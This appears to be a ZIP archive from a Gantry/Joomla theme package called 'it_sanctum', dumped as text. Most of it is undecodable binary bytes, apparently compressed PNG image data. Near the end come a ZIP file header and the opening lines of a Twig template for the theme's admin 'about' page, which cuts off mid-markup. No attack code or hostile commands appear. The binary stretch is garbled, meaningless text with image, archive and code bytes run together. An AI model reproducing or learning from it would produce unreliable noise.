�e;}�>нx�>�h����7��.a�Lvlr�w������-^��]tc[2���޵�^X�Qk��p�HǑl�t�b�A��w��0��;=�����TZ:;m.A3�>��ӟ߹��Fl�w�$�Ɇ:zȨ�o;�3���@�=[��k��b�� �!�ջ�|������\Q�`�x�/ϵ��W�`)�K�ȡ	���>������<���g��ʥ^�8Τ�rs�k����C�鐎�S|^����܃V�M�%�R���z�h�5��x�=���q�Q��O�F��֤鰅�>�.xp�X�Z���9T��0C,<��ߕ�ԫ���ۥ�"����
��y�x��KCԄGf�y��rm�RXIR��nv0�#�ɳ���D��E��R����!��SR��Yf�,B��3�	��y1��YU��:� �@B<~�LJ��?q*�$s�-���nFj�m�����ax��g��?s�!79�x?~�:I�3AP�+�ʵ5b~����SX��5�oͽ��=2�Q)=�1��y�э7���S��Y��P��h�;�se��O���"H��K$�Z��A<߂T� ��]�!3e�x�y�����hp�D�)?���d]
�����
����ŻX�y��c&?z��7�w����R;��kix�>�N��X,>��tŅJ��S�2ѣE%ta��ҘI|���������������]�����m`� �]��������,���f32�eCR��Խ�;��k�ݾM{��U?q��Ž�[Rdw|
�	��_hx�!��i��~��߱Q��JO��w�g�ME}Y��^�*48���i�Lr4�?�<�JR��\����64`�-�E`�w�\���ƌ��7���y�%�-{�B�Ú*��g��ήn�v�,�aݘ	� Ǣ���3���t:c��a��c����woQ��T�DP�y�0z�H2.�D��VG��G!��e�f�����r,K��E&�p��1}��q
N� Am&Ľk���idl���4M��#�T2gЍ�L݋�o�9ec�$��t��{��?GS�F�f�����^}��!8<�y�)>�x��)�BiRE�/�;+�-���k�ѓ�oJ����"���	�d��2��g>	�`F��-ܹG�s�;���v�<O�>���l@**t���s�*w
�#"��)sTFN4�d�q}��l2�'�.{Ap�$ԞdX���_�(��vJ���'�!)�hLM ��һ[�2T�>r�Y�t������<@��\:���)�.����̡��	�F�SE:	5U��
rUΓ��ճխ��o'��Si��pD!k;��j\D�q�:�ܳ���Q�$�v٭��JN1#�y�Ƞ�rE�rH8��^tՎ}����=��$��7�E��D��Bc��LJ!��̿|��'<���?�s���:��� �:�܅mL�lg~��N�[V"�� #��!Ař��|�O�.�ϕ�CG�?Jt3x�J॒bE��x,�2�%���_��
��̈�;�x�雏@�� �]VMF�(�nE&tcg�o�H'�	ٻ�/���a����{�)�������$<�<����Ă<'�G_u$G��G�O�B�`:=S8���Շ����G�����
��W�P��i��������<�(�S�1��o�kL��'#������;AQ��\'U�,�N�lƤš2}0#�Kg��r���T󻶨H���7�o�]�y�7�_��֯bg�O�t+�y��:@܃��
��l2��0<�N�a�l����0�m9���w��Չ�W��R�ȡfVeU��xf�d��8v�1�ل�����z��_Y�;$��k���$=$k�����;t"�=(��Ѐd=��n��n�t��H���9���$����	��K%�P$«��N ���ɧ�f&N��f�	 u��̺���JK���F���	��O�a:�޵G��J�E�|�۰J�!��Zv�Z�6{7N�����nݩ�ižmN���R1g3a������a@��wL��N�߹���k&�Y�C0�TV"�*D��N�O�)�d���F�d\N1 �]I�ϩd�na�*��9���k� 8Z������Ń{m�B�~2:�J��Q��!�W�;�m[p����>�pf��[w� 27�/�9��+Itzfp6>����?�"�eF�#��o��-E�B�܅ڥw�D�m�������-՜[,�Օ
�.�ճ�f�������A��EQ}4���B���|�H��Q�ݦ�Q~CR
3a:2]gbA�������p�5E��p�~~�d�QQ�Os�
h�@� ��@ܻ����g��m��W�[�rz��F*+Ev4.1|�x([6X�G�Gs	����dt,=t4�w��q�>߾�t�0$�4Ì���;`I��; �ڜ߽թ�ǡ����w?4�Ac!�Ξ�ν�JƎ)�踘��:��Ŝ3F��d��9$��?�k��T��81�Vό�*�cK��ʆ:���9,�=Q<~�ѷ�N�ߺ�N��1���L�؀��q�s�Ȩ�
���Cil�� ��B3z�(��߉jz��wl�[q�,K�t[�G*?�κ��_�Ѻ�����Mi����-��Z���q��Ӟ3���	��#���,�;6�}3|L�@��1#�K�G�s�po��>zఠ�5��l,���R}3�Y��zj=ǻ-�
�����h�\�,�F׶��tv�l�k�wI�~�U.RbF��%�$�0,��m�86�+��CF6g؎��#I�v�f*���U��ѓ������6�t�	IA4��é�T��U��)K��[� �f�8�Go�؀39�Y��k�,���^5�4N(�6���T�Tk�P�d�M��[�:��'UfS��	�)__��a߷����Gz�!k����=l�cu�����9��	��{gC��d'��<<�߲�JKG��N�����)�U@�:�Ý*d���4����r�[�T�0���b�����8�]r}]3�k���F�t�֍�<�W�mg��4-��q�t���8�".������2z�f��[`���]���}��:&.�I�|��C&wG{3:[�Gsk�"s^:q�=ѧs�iB�r�mgE�� c�|���B�~��	1� ������`��'�W:{��;�{�3ޑ���!��9l4��;�c�G��;�@f>�7�z�7�!�#�Դ�ԙa�	3pN��9W�$�5��[�g��k�-˦ph;�|{�S�ʑ��_"�^���x��0#';7:�h��E�4�@��m����B,�Gf/��g���H�Y��*|���FR��o4E�!��e=x$��q�8�7��Ar�K���S"�	{�v��t�����z����LF4E����>�d�o��l[Q@��v�yDD�TV�H�	��mp��G�ؘac	�Z���^d�2�Mܫ+=���226�Ɦp�Ѓ��x�FR8��L��5�-է?��$d�vT��{q̸��Fd��h�as�3/t4��T=pQ㺫�D�N�Ξ��f�9Pԗ.!taRy���wU$�q�e7]~3z�܃2�M��J:=���O����fR��0�*r���̄HF��j<m?]䋏�L��o]o?t]-�k3i���!���$�&*v�cq?�G����'����EY�$�'���?uJ�$4Ah��'�9����;ȭ��o����Ȯ���O�v3�`Y�O��in�T��B��KwףNG��1������\�M"-�Fߌ���>�6t������G�m�A�r�j�/�Q�N�7�ꤲ��%�'3z"3fJ[�c;u�cyB�>�}�>Pw�*��1S�\S%�-���qx�:Je2�7�c
2&�0��$WU �{|$I	��
�͝w���r�9��I��.C�����E�9�w �&]���{]^$��ةs�is���pԊ��]��"9d�kv�,$�I:&��J��A��&�o�17�5�ǂsdt,���X��KH��{4g�����y�6���N^��1h4�\�N�&��f��m9)p�!2,��6���qˎy+�-m�����{�p( g��U�fQ���[h�A��4�or|�����
ʫ�p�ɑk*=�����;:��ۛ.s���'����!�,�{d��_U�̶�dTjo���R}3���^��1����Z3n*�e��E�?5�pN<`Kg�-���ꅋ������TRd^��}�4�wL5C�E��zY��*�o�Y͒e�O�u+q��'��A;]��;�|͢�����������|���߮�3�^w�-\Ǽ�s?�$X�����9}
���Vo?m����'�i��y�_@܁���+럸�H�7�S'���Q_z
;�bU����T�췣A�˰����ޭ�;���	����!ϙ~�L渀������Tӷ��T��v�%*��i�cY�>o�]���+�w�q�q�p���`���!�+FD�\�F4.�s��_v���.ARŒ����YQ�UM������x|�Cn�����j]���0��~m��ނ�D�q*B-��2���[)�\���Q��C*G��6�+��V���eh��k4�;:=v�0�%K��p��R�­[)��љɳ���<O�.U۝EDX8�$���sq+��p�=]{�������:�^��(�~�M���K�e�Ž��1=!L��;��wO�F�Bf4A�h;y�3��K쐌��iҙ�܆�v=54�|F��s��(":V>s���q��:�h��3S�-c�4Z�o�h����g��c#�w`.rt�9�t�����BYG�I��pc�;&�b�O�;���[YZ�Wkؙ(j �@~����=�b�Q�-qkV^�틴���a�l�����Z��[�-^�&Sz�3.h�{Ľkwϰ��8��X�u��˛�;�� �F��;���`�+�5-�6,�,��6[*!�&C��=x�c�R��}�>�48yrX��MFW��JG �_�����
�8@܁�A�%U��"���%�=��I�S.�R�q���bd��߻���92�t0b��vK�>\�{/"8R������xeR0�ީe:e�������F�rAb	6�O�+U��z��{M�S���`�%V�+�}�L2���;�ƻ�͙�Tr���0����s�kb2����A"��nQ�λ�J$���ͧEl/�]��K��n�
n�o�<`����Bs�;�YK��x5�VVq�L�ϕ^}�ߺ����3���6���߳�o^�(+�?;:�!�'4W,�d� �@�b��ӆi��.�Y�^����{B�v��{i���ơb*'�����B�#c H���/*�`B�3~�����6X�缈��߆��C�5����p���e�w ������!I�ũ��e�sMnx����q�vQV�e\��1k�\_cQ�	]Yv���Aס՟)ڵ�ٳ�9L{�=ꅋ���Pox�)�����}����H	�4ˡ�t�q,AÏ�w���N�CGC3����$x	I�vv�D0��Qf�%X��v���q�O 7�^{�m�/�Ľ��X�N���[��_ND�R=z[6л�L�
��t�tFD�{Uw�?�y�x�p�u5kj��9ow� y��$գ�]�����Jq?�"�
q�����v�\����A$d�q�1�A��q�r�F�\[M���,������x��p8�$u��k���)���{�<Ү�%E�����;�G�Ce�bЬB}����&�#�vrE}ѕ� �@G�sdFO���x3�Ƒ�W��!�7J]b�U���^v�B�B�v�W�X�]���NN!�־HHDA����S�"�;�N��[�U*���g��G�ф���'�,9%WU�^�#c\N�}��K5�_o�vm1��}K&2�T~�y�]�,�()=��*��]�XpD8�W8�DZ�j���q;�<�h����W����N����{���k����Vd�5��^��{���U,"#��[\S�M�I3��8�g�X�s�VJ�ʴK��i�:�A���$�uw�d��?�C��X<�W,)�*�b�!�z��ї��
��d	�7���fa�ri��$3�gS}�{��V�����Z��G��i�;Dg�?�*=`���ٻ�	���#Oh��V�4��t�m�#̿|]��=�^�6�E�!<Sq2�������=F��85?���h7��D��Qi麻�3�����p�Cx�$s&*)��Mh���M}�U�?=gymt�x�6C�Gjo{���g��uX߳v0c&y��+�����!A�l����2�l���WG����Cb1���o'=|l��"�uw<"WWrV��;w �0#�)r<у��G����3��\7�ˮ#X5��Bn6�������MPlP��I��z�8�/�3�6t�֯�);:Uf�T��@2!�Ѯ��j�0�Ǐ����uUq�6QT;�|ww к��n{��3 ������p(�"f�$��X���|�.��ϙɳ5�]�l��+���+x�W��2���J���11��.�LJ��3�u�������t� �Yq�f�� W�F�v���[P�L�Xf'�P��T�>�w���t�{��J'^���>���\��~q��,UG���S�벹�M_~���]�s�Ai�5�e0�g���j\,��j�\�Q;g�k�mǤ1M7����P�OT9T��RR]��q*�]z�]��k�uR�9Pvw � ����PX�c��F�%W��9�U����A��e��Z��v�
�D���kx�^[�(2��_ш��-�h��{�	Y;��lєqZeC���J
rB�w�:+UV��(ru��+_��@6ly���-��촹N�w����#����3gPi閿
¬��ݗ[���;�*`�7�"�7��
������RUE��C1�J-������$
&Szy������դYi��mz�(v�y̨	�k���h.��Uu5�ֿ�b�%��\\�q�)o���~ӟ�r�DX��L��[܍n,��}�����O�e�AZ��d���q�dr*�1�j\�]H9
�#�+��a��".��y�9D�wׂmR��+�n�bX"�)���4��%�qA}�
6���̸)�_�5~�mշcA�.>��<�*��Đ8��}�.F.�hw��|Aܚ_
�`��#n�Z�!:�8��u��G�h8;������A��™�EnI��������!�.)�e�A����1\��)C��X"�Og/U��Gs����@z��=���ӷ�jMi��
��
6�Q
q�yŷH�B@�an��u�~<��[y�F8ǭ#K�[S<�=F�J�O�˴]���7�ht�LB�t�9H�16�G�YB$Xh��&f��ܻ�N�g�s'��?�������w9���3�&�s.�p*1�L�-��G���\����_�U_�����HO�s)�T�]]`�C�>얻Kz���ߣ�.vj�S���p,t�N��ό�dK/�r��փ�Ort���fy���n�֣��� 7
 �@��ΕἉA-�:7�Ri���Ԙ8ǜRY��LF铡�SR��`�����hV��.t|��ދ�[�p�����;Ю�>�S��wd�؞��c~?�z�ŎOͿ��hx:�CSF�Gv�9��L����X��U�SZ��m2�Gs[W2д�K��L �@;wZ�����j^�3�m���p�$,�M� ���v�Q���E���wm�k:	��F����ݖ^ƪ׾ð�K�v��9���L������Mb~�km�v�߶��
�</;$P��`V��B�,��BN�*'��b������^w{P��(2!I<�d�;&��~�UH��"����gMuKd��uIK�����7���̸�-:;e6��Ǫܦ?��3��Ym3�_��o��„隦�P�c��	�e�?��aD����п�r�����Uɲ\Sex�� 1����'YS%�D�/��>�TU���x��s"IȒ�ٰˢ��떊�3��x2ۅ�۬If��K��
/<l��aFMPfB�6)Dw�)w �0~�~0,���X�9�9O��ǖ�m�	+�Ivq7����ݧv�����k�h'1�(7����gÖ��5*?Pü����}�4���[6��w)�\�;H��og��F��1����)ڛ�u|j����b���`OM�$�-{/�K�R�(pksD��i<P�
Mk��]w�S���?�,.LH��G��i���cQ[A�q�� ��&�܈�ߣ!�Ќfɭ
�
$t���&$���66�z���L_��<Nr�K5�o���k��@A��qT��hhQ$@��d�S��٤x�O �@p{DT0�l"�\��c�=`{/���
�=)�rcw/{��3i�ʹ�t����ʷM���5ێEQPP��oY@܁���2;(�9�����o$�A�̨��K��>�9�B�D��u!=`�_��Yt����_qu���[��t�z�;�����.VC,�x�P��I�)n&�y=�)���'��z���H&8��Z-߯������ͫ���������Kg��{����f]��=܈{i+sQ?x����]�q7�>�|f�$ŋ��Ѻ{��j��Eyu��]J;@XJ� �@�Ҳ�
h��
��L�inN���Fd��W��l1?����+9��eT����ɳ������n–��_���H�����N(�6ڛ�k�U_�h�]n^̱��o���Dx����m��xMU���Vg�l4��
N���\s���7�����t�h� �9E�K�g�<���n�Mq!�;Ю0c&�s4�n�/B�n'y4���;�݀m�xO��Z{�_oIJw���&�"(w�wc������]�s�~
�[k�yп:7�[&��!���h���jM�f��ӷȄn��	̰1���.��^n�X*}�c��x?v�<�e�ӳ�Ă#�	D;lx�W�ag^H�$Qp�F���s���TZL&��ح5h8��K�ꑱC��!kN�3���(�e�p0Ke��n%h��4
���6�O�r�a��SZ�UDx$�3�p�.��3�ݒ]��z��N�_Y��
�ukIǏ�6C�Ā[������uF�5tS�Q�a[pT6�w' ���	ˣCc�4����k�B��@�'�w ��,�A��b"�-v��,FFQ1��b=?)E�
qB��d��9�V��>�t�����J�KM��Nτ��e�4B}�e^����;'�f�)=�x�s!�$ؒ��B�*�=۠uf}�&9����!�Q���윋�����g��iҹ2�t��^�Qy��=OO=�"~�z'᫩B:��HtDAv�+�Zui�h�X��	�
����/'c�K6�)�>�_"��oYkI�*74��rρ����G��v8���vq�*+�H�P�t(w ( �5�����:d$z��7J�8�Ѯ�7v�
qGF�TV�h�ټ�w��_Z:���zг:�b@�
DdL�-��ӰS�O�v.�kG��,5}�^��D��r��b�p$��t~�t�;�ހ��r�jo�G1���N^}��,��dx�)������.˽���lEZ��\W�΋1�;�7r�im��X���U�bQ���XK��H���{�0`^�ܗܐ��'��u5n�7J��h���c�Y��>�P�۾���0d�#�Yr�~w��H�у��&c��X2.'��i��T$�����U�{T�@D�{��(
�EZ�9�`َ�	֯r7�Q�y����Po^�t��
Q{�U�
!ի����C(7���O_�yZ�����^w��U���𩒭��'��ET�t_��~�EU��n�C<q̼���N�s����f������&��f�tL���U�5�n�F�T]ix�Y��^yL,�����Е:�!Y!C��I���Z��?���?M_�/���u5t�P�X�d\3r<�s e$�"�p'�t�=�L��@	b�q�7)���e�;r=IZ=j
��Veh�3wT��t���*Q��Թ�L��2tw�ӿ�	dW�yv
��T`ҏH%���9�2��L,9��a�`�y��4V@�]zW;��\_��܃�i���龜�m�@!�%���O���l2��=Q�;(��@����j�"�F�п��c�'�ၫ�F&�`m���Nnw��[֛W-o�ꋮlﶖe��O;*;�]�`����a����(�dB2QxLVyw�!���	a@�;ݴ�ߵ,�7�kx�	K���r?�.)�q�e���5hFҜ���@�&���7�?x�q''=p���e�>~!QO��q�"��4�Dd��K64Ȇz",�rJ�|�
�j�زC4e$I���O3/��qZ�ˍO��������z���I�E�(\��Gj��Ů0gK�Mk��3W�N�(7�����ʌ��Yr���s¡}|�.� ��.������
B�,���0v�i�,�7w�]zwG^��y������`���rM��OݽOR���_ًO�}�q�3r��WF<rH8�W8��vc�w+|N˃�	��;����z��d�����rw(�t�:=;{�}ط�V�N<��wq�N�lx�1�W��}|O���rf1w?�w��wP6�Z'hu�/���q:
*=����0�_��(I�K�fq���x�?O��>~�II�a�[h��f�e	9������θk��|�&��~�dL;��C�C��7V�Z�:D�檛q�9A���b��kn�jŋ��i}d�(p��g퐊Ox�2��P���W�,��\�>��Ӿ0���PO&$Ɇz�OCWq�v΂���X���l�T_v����)T�L�,�+ό\_k��=��!灅���U?�#��wn‘-�!�#$�#'X�Kܟ���N)��eҙC�u+mN�����N3��>�.L��Џ@��CDD�,"�:����"h��j2��E�V*3f��	��-�?y[��4]{�-�1"�f���\�����7d$��J��K�Ͱ�OH�M_~ ���.dR
3j;{:1n����c}<%�g�Z��vw ʮ��y�Ї�,��[.�ReEWh(n�O
_3�=U{���>������ʑ#:Vw��Ȭ��K�!A��Ǐ4�{�?�<��B�':]���?컷}3y��B��*�?$sVӛ�3��{��X�,�����\s�E�U���VٕG:};	Y;���s���d�=O�kAE�����4�����o���C�M�������R�Y��@��dr
��2Ʉn�J}-2؅���2c����q&d<��^x�1��0ؗ�����f�tz�0�%�L��dĂ<����9:�+�� ��nf)�18�����T|B8��3��j��,��ɤ�g��NŲ�Y�)�Z���\�o��a�%�y���7��
�D�ЙC�_Ռ�߳��W8��톙4Ss��֑�\��9EL���)6��N���f��1O��"���q�$�'�q�V�9��6���[���>�s4䐰�E��c�]���3/P_�k��ܦ?#")#{�����9�'_�l�o�h�*�o�ʞ����q��.dm7��A�p���3��N�wC�7ƑCf�v�P�� �K��6Qy���G���7Z�O};s�ph����#􏽂�?|-�uC�L@.q�.�:��b�|�
�;����N���;���vօ���`��A9�!��g�:���ţX��ɵ�-w4rM��f��U1^�o���0����Yڤ����vbO��r�p:t���%�l��X�o��u��әØ1�}��*�Si���
'��|='�|� ������ƒ\�Yd9
Y;�ly�F];�bv�yv��8Ӽ�IF�h�f��'�{�T^J����M����,�w>�}TX���)p�z�Q1̰1�i^�܈y����c���\u�cD�����X�W��t-Kۜ]]io�(k�Q=zC��;d�N3h"/�V������O�MF����^�F�#�i.�Nqi�Z�Y|�{�\]%�գR��؊SⷮwUvd2����*�
Eꅋ]�82�I��p�W���j�z!�mʟU���~��	ܟ���Q9���h���Ѵ�a%��-���
��;t����U���G^��-+��	���_�u����dSi��ϖ��*�m;0�qSѣ�?$�Vg���k��S�†E�x��4��/Y�N���7ٲ�x�;E}�U���%l�τ�]�>�񠄃s	WG9��<�u��w�]t��X�('X5�c#2	�1�[+�s;]$�����N��~d/��.d�O�����+@����mVv���\_�����:��<�dΤ2���*��Tؿ[Qz���$����/{�rR{�mh�b�T�q�����3��.�M��?~3��/-�G�;��z���"�6�a�̦GM��h��ƛw��9�h�Gof�lǜ
��Mܺߑ�ODFko�?����q�'G���I{Y(I�;����XT(��Ef;�b��͞�m��M�fSv�l�X���o��L�,���s���#�l��K�� �@p�V�jt�����I3��$dnͯ��]-]�c���L��#���G�K%���{��e�P����wn[�4�Z.��,U��
E�U?�q�d�d""��h��JW�����u0��a��K�5:�	�5W���kEs;�	����;�rH
W��s�4eȢ��������J�c�;6qk���Z�<I)��ѸN^B��Wm�˼�k��5:��5�n𛲋"���j4�a��Qf�t��_�o��
Dx���_n�G�"��j��k��x�F��|h��|��B����y~��d����Նw^ �����~J}�Um{%�T�
�_��m�`��:Pܑj����GH���iB�n�Tw��T�>��֑ ���1����l�(f�,�4�HXM�|hۘ���֔r�6�2Iܦ?ł#���4���b�҃GH�'������s/6��Yxݲo<-曗���������i��M�?��
��O����}CA3hD�̖�P�W����i��	M������M��.�>��ATUX��Ѥ��Y	��?����Dx$;�B�C�io��U�����ߢ�>\wף�Sv����^y��9,���͸N��ޖ�۰�L�Û�O�y����B�v����9G�3c����xc�MU/\�U�jq�K�iiV� �W2({+
�G��V�$�KU�e�U�\}�����U$.���w�nꅋ��o�3�QJgɩB��!qW�Ŷ��٭�E�������P�=�n��|�;G�[i1Rv�l����oT5��s s�A���9��W4��ɟ��� 8�x}��B#�;K�{�[�B幺.�}�-�XM{��EP}3�3�Ga����p����.IZ�CYҹ3*�b�N�1Ul�sd*c�x�GY�Kdg��L����q柾��ո���}�!�
]R�9��>{Mp<hS�t�fiR.>k^�-?#��Œ�DDǢ�fA�O4�ɛ��DDŠ!J��Eh�N�Ɍ�H�%`�FGh��V�T=Ň06��)u�Rm�\[#�T}��E��JBÞ�<	����'�.��Yp���wf�,���yo���F�^p��@��w�;�2�QT�Y�is�bЕ j�
Z�k��L�+�=S�x4�����&���W3g��u��0�79Z��� H+��:�[Ε��ʳ�ҙ����`5���H�-�;�1g�SN�庵
	�报�-E�\#�����-��h�P_z�黏��2g�����?�T��[�҈��et��D���`���(�5�v-���'���;�õZ�aW�b'L�Kt�w_�F���ˎ��M�6�6���G�O�)���	�Vs�uCR.�g��YW	�ϡI��.��Q��5�ŏ8�<v	vid�#��k���z�g�s.�N�4-�R,ȳN)���S+�F/�ɺׇ�=r�e���M_}@���>Ƿ�W�dɸ˭���q�=�uό(�M/.U�#������C��{-Nv�Lz�D��"!GY�"Y;{�z�Ve��]�`����m�k��
�&ZMF��E��M�ƣ���B��>\��rue���&
�2N��.q�%���=uw?fx�[H�[e'�c5��nK��k.�V<~g��\{�dH��O�u®ͶqѼ�[2!�4�^�nwp��2���3g0c�x����֯&�{��]�LL�\]i^��{�Ҡ6F��.��4fg$����>�J��
/�^TZv�|2!ɚ#E��5*�+�JO!�¡�<�n����}ɘx":���AO	}8��>��Nw���=��=tw?�c~v�ou�E�TJO�,����z�����{	�e@܁�.�1q��_Ur��S��U�+冝>O}���C�DJոwI{��
o=��v�
��#�lr�!�T�
8ChtDD��B���X5~�Cҏ����} �c�qB��Tz�`�M�z��	[:{�<<��O����[��Czl|�]��6��ޒK@��r[�@�WX��萑Vc����1~�X�/7����(db��V���05p8��B��O��w	�1D6�Ĝ}|�.�,</�5r]����~2,�LL&SӨ>���S��ݟf�v�Ln�Z�h*5�j��>��\W+:��koK"1�Z�9�w �@��K�g���:d��[��[���p����M���*�f��J[<�=ͺ$
�w�|I:g��dM�����Hw6m��SE�jI�B��x�x�@,>)��Gr$$�Lx^���1<Mn26��J&��	I�ѭ�-����kјg��G�mlj~��0#"��,��`W�'^�]\q:?��l]"Y�Z�u����6"W3����E:?~æ��ZK6��m���!��̸iTz�k2,�U��C��^���k�jʶHRTZ�mI��WW��He�ҙ�"2�}�⋗*Ϊ챟vZ�H��k��G��:�l|�E�϶^ܘ��+������;�+�)+aۑΕ���X�`֦��j�d{j|�%E�#;y�M���`@LN
�U�m��XRϿ�2��W����h�&f�L�)w�L�B��I�%t]�,���IU�T����d��
8�܃	�K/�k	+R5�ew��$�:a��3_�,y��g���V���{�����vw��";ă���#��'<����9�/�̮���Pv�_�-��ϰT�~���̨��ڧRI����ggc���
o?'��@�o>򥠕5t�l�C
.��`�/>!�C�{�|�Lv�]�q�b��udb;��V�ѱ�r���f@��L��ӗ��'E�^ۏ�-1a5�.�젱`���b�r��~���?��FuO��}�}��󆱓m��z�Q�qC��Z�Q1z 3�q������#�]�����D�� ��Z�X��x+^��]dqS���#Ʒ��a9�β�{�$���+���RԨS�b���I)��-�Ξq<�6�"}o������^�,�ѿۗ��JMC���UrE9�q��r��o>O�\����΁�@�)���ަ�'��"!�E�t<kWvY�i�]��c&��r��#G7��׺&]����d����H���G��Av�Ng��x	�ݍ߶�ᅇ��h����0�6}� ��m��ioؖ�@6o?�=j����w�\SE��H���<�64�n2}��}H�;�h�@��GN&tk�"-[�0,�•e\aCpjIjLB�����,�
�(�c^��m�
����i�Ŝ�p� �M)>�j[�wj�`��#+^{�m6��XTh��
O�ߩ�8Q��*߮�3I*)�֯R�+z��6(4T�ī�pj_,�.��b�P�$NΥ��U㧄J%��V�V����G��F{�n��M�P	��n�2
um�26��P��7�mK�"d�0~���j�TƐFCX�d�q���Q/\,��K
X��`˯�M2��D�<g��j|��D�ЃF0��P陭�CF($�tm����G��*��-ˣU�$�FRIDF��IdRw2>�Ѕϵko�?ÿ�o��5T��t��T�h���P%��?:��Ȥ4'�!b'���a]f�x͵���H���������h��]���N;��<��VC�{CU�7<}�s?n����#b�����@܁v��
��h������O��g��X\w�Q��j��Z���m��	����UZ=�ɧ����EIe6�&͌�H��ۦx!��p(�߻M����6Z��n�hNx�"e�i?�j@�/]')�E�3����Go��Ri�u�<�Χ!��-��Ζɍ�8�!^8��b`ԄF�sO���A�G�_�7z��	�[
�m�y�OrmM��5Hߩ�TtV`���A
��Mw���A��4k�ǨD�%˘ѓ���-V���a�cɤǽ@PA=2v��jLtEDD��u���{�t�4z8���0CF�n�Ꚙ�x�w�$�*�K���H�g
Fs
��[��}�L�v>���;]k�q���ϡx���)����.L���T�^{vܦ�rM;��O��@܁`W�Wp��·U_�Xiѧ��&O�%	�l65��{��a��d�)Ur�]���ړxx^�t� �2�K�=�K��S�S��.��[طS���"�R�4BI2����ۏ��k����j��O�d�����^�Ζ��_�U�3/��R�
�T8B�a2
�w���4-́��������X�'9��I��O�

�ƀ�W��&�z�NHFE��Qt�ꅋ���������e�����G��Bf�X�2}��o?�̶X2<�)�Z�_&N�/
x�pU�)���'�����N[[-Ļ��\LYj��D&�2��S�� ���B��*�%���h�D�GDŴ�p�m���T[����՗��O}ѕ�>�`S {7� |�@+���ؐTRd^���ۏ�I�n�E��k�a/B�o'�-��O��s��ן2}�)��*X��o$V}�5]�pil��5tT���񻷘���=q�1��w���)��ҋL��Zo��Dǚ��vX�� �
X�@��6��L1�N�������m�1�eYk,e�
�
�=�6NBn�o�V�F��,�?�Z�o9noeWk�^�P��n� �@�0}�Q���]��淬��{�������ɂH���ed��?�?y��O�0���G��h���CE���6�XGh�?bw�66;��h����dZ��l�>�?�7Ə�R>�Ņ�-е�Z��"V�-:��>M&���`j2�J�%��3q��^~�5A���>�; u��"-,���g@�ŊȈFO^d�<T�FF�x���&�%V��ug���ƙ�I����&C-İ��7OȆ�W��$��u,/�(Ĺ�B�;(�4-�Y�R�q1�0��!b�Ċ���t��N/��f�O�S[�Uz�`����_����߶�����C�|=4�z�p�k���cɰpUC]%~�e��\���!�$�;в.�N�+�>��D{t�a���(7�I���F�se��R�^~ӟR�)��I\������S;tQ^�]���(���Wֿ�l���dB7*��pp��<™���I+�d���w�����:~�V[���"�)��B�k�t�4����Mo?�v%�͘g40gc��?j|�E�7T��n�0c'��f
Y;�^��ba>({WT�,�Hw�LKEz��!�ۉ�͓$�>PE�rm
;{>=t��h �E�d\�� �J਴�KC����n�J�žz#�L_����U�����hN�3�3f�h�7�h�eV^�����r�;_I�x)U�l�X���E�ē����T��Z**��+�*B��&c��s��3RIcRӈ�DB���*Y��p���F0���߽EQ:ʧ���ݖr�8KZc^7�Q^f��[���dP�	�
����e��=cx�	Ş@�O��{����c�c�e&�D�Iv��w��t�T*+差�RJ�٥<""J��3�l��݁Z ����;�B*-�*R�A/N�]	Bw�#��F���2�;�EQ<qLػ��{
���2���]dlޚ�N���ž��oߙ�Q��.���<�Q��|���g�`g�oiC��^���(�#ٙ���ǀw���n�Ls|�L���&�ȸD��-̓�Ս�F��{
���1}ӲݳrM���L_��}�Ρ��$hZ%{�Zn�*|jc�Й�Br��{1=xd;�6F=���1#�CqfFE:�b�8��P#B�-��hKOw����]d^�����v|�߾��ⷬkx�1�4���Dm�-�M&��]��E7�n����:p=Y��/U�k���Z�1͒[a���n�ª�Ϊ�کTQn	����<��l?�)<�m��v%�f���"��a׻x����g� 4-��q���R�Z�q�P����ԼE��^��#�9mx�)|_�$}�5n�޻�<v�L�fw��/�UTw#tz2��y�׮�g[`t�O&�H��m;WA��P�������?k��@dž�$����M��+FM�>~�L�f	$��aʵ��������N�re�o�h��3�f	7��I
[�uޭ��gh��# �AB{����3��G�t��#�3�w��T�� ߋO���T�~���b���,�"ي@���1q8�IK	�u=2���<��m��_�3}�~`DB���Q,����#���"m���2g�x���/�1W-z���'�!�s���b-At5�`�~��h�}�Eqf��?
��f4��.4�*͢ �%��I	��:8�ycX5�V�Qc�c9�1�JM󱊐�X��?�m��^�!C�8A�Ͱdt��G�@�H�</�"�[{���W����՜��ӃGh�dm�~*�R�%�5U��O�^
{�=f�xn���$�G�ko���0���'V���鰠��A{4í�E*=�	.G�k4�_�m^��3���q22
�ax�K;+<'��z��q	�Ƽf����y�=9$Ig�c�%�&g���4W�@�Ӊy�����,�P��Y,�����1rE9t7w�1�p�r���q5d\"=|��wе�+��^{���t����cy
�\�s�P*�x���/U��S�U*f�l�d�+��'��"c��i�IgN���M��f���\}��W�f�$�s���ݏ����@�Lj!��0���~n��b�q�Ĥ�i�,Ñ�V�5�ҏ�˲�p#*}�\S%���dD���֬p�Yw�v�1�W��1��&B[�&���;t��-��dl����I���?8q�@h#�*��ZŪ=%�	�	�#����V�֝6��r:�	_|B�4��`� �`o���4��&q@�w�qq@�w�qq@�w�q@�@�w�q@����:��o}�� �;r@��� w� w����;���;r@����� w�������;r@��@��� w� w����;r@�r@��� w� w����;r�;r@�����������!IEND�B`�PK!�r2�	�	6it_sanctum/admin/templates/pages/about/about.html.twignu&1i�{% extends ajax-suffix ? "@gantry-admin/partials/ajax.html.twig" : "@gantry-admin/partials/base.html.twig" %}

{% block gantry %}
    <div class="g-grid overview-header">
        <div class="g-block">
            <h2 class="theme-title">
                {% if gantry.theme.icon %}<i class="fa fa-{{ gantry.theme.icon }}"></i>{% endif %} {{ gantry.theme.title }}
            </h2>
            <span class="theme-version">v{{ gantry.theme.version }}</span>
            <div>{{ 'GANTRY5_PLATFORM_BY'|trans }} <a href="{{ gantry.theme.author.link }}" aria-label="Template Author's Website" tabindex="1">{{ gantry.theme.author.name }}</a></div>
        </div>
        <div class="g-block">
            <span class="float-right">
                <button class="button button-back-to-conf"><i class="fa fa-fw fa-arrow-left"></i> <span>{{ 'GANTRY5_PLATFORM_BACK_SETUP'|trans }}</span></button>
                <a href="{{ gantry.theme.support.link }}" class="button button-primary"><i class="fa fa-support"></i> <span>{{ 'GANTRY5_PLATFORM_SUPPORT'|trans }}</span></a>
                <a href="{{ gantry.theme.documentation.link }}" class="button button-primary"><i class="fa fa-book"></i> <span>{{ 'GANTRY5_PLATFORM_DOCUMENTATION'|trans }}</span></a>
            </span>
        </div>
    </div>

    <div class="g-grid overview-details">
        <div class="g-block size-35">
